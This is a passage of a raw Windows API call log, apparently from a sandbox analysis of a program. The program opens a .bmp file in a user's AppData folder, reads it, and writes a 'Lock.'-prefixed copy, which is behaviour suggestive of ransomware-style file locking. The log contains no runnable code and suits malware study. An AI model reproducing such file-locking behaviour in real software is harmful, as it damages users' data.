CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/5fNAF_eBT37aF.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\5fnaf_ebt37af.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0190.585] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.585] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0190.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0190.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0190.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0190.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0190.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0190.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0190.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0190.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0190.586] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0190.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0190.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0190.586] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0190.586] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0190.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0190.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0190.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0190.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0190.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0190.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0190.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0190.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0190.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0190.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0190.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0190.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0190.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0190.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0190.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0190.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24b30f8 [0190.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.587] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming")) returned 0x2010 [0190.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0190.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0190.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0190.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24c7a50 [0190.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0190.588] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Lock.5fNAF_eBT37aF.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lock.5fnaf_ebt37af.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0190.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0190.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0190.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0190.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0190.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0190.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0190.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0190.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0190.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0190.589] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0190.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0190.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0190.589] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0190.589] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0190.589] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0190.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0190.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0190.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0190.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0190.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0190.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0190.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0190.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0190.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0190.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0190.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0190.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0190.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0190.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0190.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0190.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0190.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0190.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0190.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0190.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0190.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0190.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0190.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0190.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0190.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0190.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0190.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0190.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0190.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0190.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0190.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x36b0020 [0190.592] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0190.592] ReadFile (in: hFile=0x268, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0xd7f5, lpOverlapped=0x0) returned 1 [0190.593] ReadFile (in: hFile=0x268, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0190.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0190.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0190.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0190.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0190.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd7f5) returned 0x24d7a58 [0190.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0190.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0190.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0190.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0190.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0190.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0190.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0190.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0190.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0190.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd7f5) returned 0x34b2250 [0190.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0190.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0190.597] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0190.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0190.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0190.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0190.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0190.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd7f5) returned 0x24d7a58 [0190.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0190.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0190.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0190.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0190.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0190.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0190.597] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0190.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0190.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0190.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0190.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0190.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0190.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0190.598] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0190.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0190.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0190.598] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0190.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0190.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0190.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0190.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17a8 [0190.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0190.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0190.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0190.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0190.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd7f5) returned 0x24d7a58 [0190.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0190.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1848 [0190.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0190.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0190.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0190.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1758 [0190.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0190.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0190.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0190.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17e8 [0190.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0190.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0190.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0190.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0b0 [0190.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0190.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0190.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0190.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0190.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0190.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0190.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0190.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd7f5) returned 0x34bfa50 [0190.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0190.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0190.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0190.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0190.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0190.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0190.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0190.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0190.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0190.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0190.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0190.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0190.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0190.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0190.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0190.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0190.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0190.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0190.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0190.602] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0190.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0190.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0190.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0190.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0190.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0190.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0190.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0190.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0190.602] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0190.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0190.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0190.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0190.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0190.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0190.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0190.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0190.603] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0190.603] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0190.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0190.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0190.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0190.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0190.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0190.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0190.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0190.603] RtlAllocateHeap 